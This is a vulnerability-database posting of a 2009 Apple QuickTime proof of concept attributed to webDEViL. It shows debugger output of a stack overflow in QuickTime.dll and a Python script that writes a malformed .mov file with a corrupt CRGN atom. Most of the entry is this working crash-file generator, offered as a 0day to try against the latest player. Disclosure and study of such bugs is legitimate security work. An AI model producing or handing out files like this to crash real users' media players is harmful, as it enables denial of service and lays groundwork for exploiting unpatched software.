Apple QuickTime 0day

2009.06.16
Credit: webDEViL
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

Try it with your latest quicktime player. -------------------------------------------------------------- #0:000> !exploitable -v #HostMachineHostUser #Executing Processor Architecture is x86 #Debuggee is in User Mode #Debuggee is a live user mode debugging session on the local machine #Event Type: Exception #Exception Faulting Address: 0x66830f9b #First Chance Exception Type: STATUS_STACK_OVERFLOW (0xC00000FD) # #Faulting Instruction:66830f9b push ebx # #Basic Block: # 66830f9b push ebx # Tainted Input Operands: ebx # 66830f9c push ebp # 66830f9d mov ebp,dword ptr <unloaded_papi.dll>+0x41f (00000420)[esp] # 66830fa4 push esi # 66830fa5 push edi # 66830fa6 mov edi,ecx # 66830fa8 cmp edi,offset <unloaded_papi.dll>+0x5ff (00000600) # 66830fae mov ebx,edx # 66830fb0 mov dword ptr [esp+14h],eax # 66830fb4 mov byte ptr [esp+10h],0 # 66830fb9 mov byte ptr [esp+11h],0 # 66830fbe mov byte ptr [esp+12h],0 # 66830fc3 je quicktime!dllmain+0x2fbc4 (668310a4) # #Exception Hash (Major/Minor): 0x614b6671.0x614b786e # #Stack Trace: #QuickTime!DllMain+0x2fabb #<Unloaded_papi.dll>+0x1231137 #Instruction Address: 0x66830f9b # #Description: Stack Overflow #Short Description: StackOverflow #Exploitability Classification: UNKNOWN #Recommended Bug Title: Stack Overflow starting at QuickTime!DllMain+0x2fabb (Hash=0x614b6671.0x614b786e) print "------------------------------" print "w3bd3vil [at] gmail [dot] com" print "Apple QuickTime CRGN Atom 0day" print "------------------------------" bytes = [ 0x00, 0x00, 0x00, 0x18, 0x66, 0x74, 0x79, 0x70, 0x33, 0x67, 0x70, 0x35, 0x00, 0x00, 0x01, 0x00, 0x33, 0x67, 0x70, 0x35, 0x33, 0x67, 0x70, 0x34, 0x00, 0x00, 0x01, 0x16, 0x6D, 0x6F, 0x6F, 0x76, 0x00, 0x00, 0x00, 0x6C, 0x6D, 0x76, 0x68, 0x64, 0x00, 0x00, 0x00, 0x00, 0xBF, 0x88, 0x12, 0x28, 0xBF, 0x88, 0x12, 0x28, 0x00, 0x00, 0x02, 0x58, 0x00, 0x00, 0x0B, 0x90, 0x00, 0x01, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x03, 0x00, 0x00, 0x00, 0xA2, 0x74, 0x72, 0x61, 0x6B, 0x00, 0x00, 0x00, 0x5C, 0x74, 0x6B, 0x68, 0x64, 0x00, 0x00, 0x00, 0x01, 0xBF, 0x88, 0x12, 0x28, 0xBF, 0x88, 0x12, 0x28, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0B, 0x90, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0xB0, 0x00, 0x00, 0x00, 0x90, 0x00, 0x00, 0x00, 0x00, 0x00, 0x1A, 0x63, 0x6C, 0x69, 0x70, 0x00, 0x00, 0x00, 0x0E, 0x63, 0x72, 0x67, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x00, 0x00, 0x00, 0x24, 0x65, 0x64, 0x74, 0x73, 0x00, 0x00, 0x00, 0x1c, 0x65, 0x6c, 0x73, 0x74, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x0b, 0x90, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x66, 0x72, 0x65, 0x65, 0x00, 0x00, 0x00, 0x08, 0x66, 0x72, 0x65, 0x65 ] f = open("webDEViL.mov", "wb") for byte in bytes: f.write("%c" % byte) f.close() print "webDEViL.mov created! (%d bytes)" % len(bytes)

References:

http://seclists.org/fulldisclosure/2009/Jun/0151.html


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top